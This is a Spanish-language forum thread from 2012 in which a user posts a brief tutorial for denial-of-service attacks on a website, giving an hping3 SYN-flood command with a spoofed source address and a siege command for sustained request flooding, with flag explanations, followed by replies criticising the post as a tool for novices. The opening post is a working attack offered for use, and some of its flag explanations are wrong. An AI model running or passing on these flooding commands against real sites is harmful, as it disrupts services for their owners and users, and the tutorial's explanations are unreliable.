elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Sistemas Operativos
| |-+  GNU/Linux (Moderador: MinusFour)
| | |-+  Denegación de servicio con "Backtrack 5" y "Ubuntu 10.11"
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Denegación de servicio con "Backtrack 5" y "Ubuntu 10.11"  (Leído 10,957 veces)
nik0n

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Denegación de servicio con "Backtrack 5" y "Ubuntu 10.11"
« en: 12 Febrero 2012, 23:13 pm »

hola, bueno vamos a hacer esto rapido, hoy les enseñare a hacer un ataque "dDos" en "Backtrack 5"... funciona en Ubuntu pero con otro programa que mencionare luego...

Backtrack 5
 * abrimos una terminal.
 * tipiamos el siguiente comando "hping3 -a 192.168.0.221 -S -p 80 --flood www.target.com"

Explicación: hping3 ---> ejecución de programa...
                  -a 192.169.0.221 ---> asignación de IP falsa...
                  -S ---> peticiones con SYN FLAG...
                  -p 80 ---> puerto 80 (ataque dDos)...
                  --flood si lo remplazas por --faster atacara con un ancho de banda superior a unos 400 Kbps --flood es mas destructivo y al final el IP de la victima...

Ubuntu 11.10
 *abrimos una terminal.
 * tipiamos los siguientes comandos...

.- sudo -i
loing ....
pass ....

apt-get install siege
.
..
...
....100%

una vez instalado tipiamos siege -c350 -t30M -d1 www.target.com

Explicación:
siege ---> programa iniciado
-c350 ---> peticiones por segundo
-t30M ---> duración del ataque
-d1 ---> multiplicación de las peticiones... quiere decir que por segundo hara 350 peticiones si quieres que haga 700 tipiamos -d2

Gracias espero que les haya gustado...


« Última modificación: 12 Febrero 2012, 23:18 pm por nik0n » En línea

armizh

Desconectado Desconectado

Mensajes: 187

His brain caught in a hole...


Ver Perfil WWW
Re: Denegación de servicio con "Backtrack 5" y "Ubuntu 10.11"
« Respuesta #1 en: 13 Febrero 2012, 19:24 pm »

Encuentro bastante mal que enseñes a hacer un ataque DoS, este foro es muy visitado y cada cierto tiempo aparecen lammers (como en cualquier otro sitio web). Hacer un ataque DoS (recalco DoS, ya que lo que tu dices no es un DDoS, es un DoS) puede ser muy peligroso si es mal utilizado (especialmente si lo utilza alguien con nulo conocimiento), además que esto mas parece un "tutorial para lammers sobre como realizar un DoS" ya que les das listo a cualquier persona la "capacidad" de realizar esto.
Ademas, este "tutorial" esta en el foro equivocado, yo veo un poco mas pertinente el posicionamiento de este post en el foro... bueno en ningun foro de esta web... (o talvez en hacking basico)
En cualquier caso, no veo muy bueno que "enseñes" a hacer un DoS.

Saludos.


En línea

Visita mi blog:
http://armizh.10h.us/
Fnx, fork de FreeNOS:
Código
  1. git clone https://github.com/armizh/Fnx
Hamster, Entorno Integrado de Desarrollo C/C++:
Código
  1. git clone https://github.com/armizh/Hamster
kub0x
Enlightenment Seeker
Colaborador
***
Desconectado Desconectado

Mensajes: 1.486


S3C M4NI4C


Ver Perfil
Re: Denegación de servicio con "Backtrack 5" y "Ubuntu 10.11"
« Respuesta #2 en: 13 Febrero 2012, 23:26 pm »

Encuentro bastante mal que enseñes a hacer un ataque DoS, este foro es muy visitado y cada cierto tiempo aparecen lammers (como en cualquier otro sitio web). Hacer un ataque DoS (recalco DoS, ya que lo que tu dices no es un DDoS, es un DoS) puede ser muy peligroso si es mal utilizado (especialmente si lo utilza alguien con nulo conocimiento), además que esto mas parece un "tutorial para lammers sobre como realizar un DoS" ya que les das listo a cualquier persona la "capacidad" de realizar esto.
Ademas, este "tutorial" esta en el foro equivocado, yo veo un poco mas pertinente el posicionamiento de este post en el foro... bueno en ningun foro de esta web... (o talvez en hacking basico)
En cualquier caso, no veo muy bueno que "enseñes" a hacer un DoS.

Saludos.

En efecto, es un ataque DoS (Denial of service) ya que si fuera un DDoS tendrías que tener al alcance una red de máquinas a tu disposición para efectuar el ataque.
Si adornaras mejor tu "tutorial/explicación" de como realizar un DoS podría considerarse una ayuda y no una introducción profunda al "lammering".

Estoy de acuerdo con armizh en que si dás pasos tan breves de como atacar un site esta información podría caer en las manos equivocadas. En cambio si fuera más profundo, extenso y abarcara otras posibilidades, los usuarios o visitantes que están aquí para ***** al prójimo se dedicarían a leer otras lammeradas.

Saludos.
En línea

Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate

dato000


Desconectado Desconectado

Mensajes: 3.034



Ver Perfil
Re: Denegación de servicio con "Backtrack 5" y "Ubuntu 10.11"
« Respuesta #3 en: 14 Febrero 2012, 01:57 am »

No lo vayan a cerrar, antes lo mejor seria que explicaran...ummm ese backtrack me queda sonando para aprender sobre redes.

Que consideran uds para aprender sobre redes??

PD: es la primera vez que escucho sobre "lammering", bueno, es obvio que es sobre lammers, pero el tema es un poco avanzado no??
En línea


armizh

Desconectado Desconectado

Mensajes: 187

His brain caught in a hole...


Ver Perfil WWW
Re: Denegación de servicio con "Backtrack 5" y "Ubuntu 10.11"
« Respuesta #4 en: 15 Febrero 2012, 02:35 am »

No lo vayan a cerrar, antes lo mejor seria que explicaran...ummm ese backtrack me queda sonando para aprender sobre redes.

Que consideran uds para aprender sobre redes??

PD: es la primera vez que escucho sobre "lammering", bueno, es obvio que es sobre lammers, pero el tema es un poco avanzado no??
Pues no. Cualquier persona es capaz de hacer un DoS con una consola (o un DDoS con LOIC). El tema es que un correcto DoS no lo hace cualquiera, aunque no es tan dificil, hay que tomar medidas de precaucion y saber algunos detalles, bueno, alguien que sepa mas que yo podria explciarlo con lujo de detalles.
Saludos
En línea

Visita mi blog:
http://armizh.10h.us/
Fnx, fork de FreeNOS:
Código
  1. git clone https://github.com/armizh/Fnx
Hamster, Entorno Integrado de Desarrollo C/C++:
Código
  1. git clone https://github.com/armizh/Hamster
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines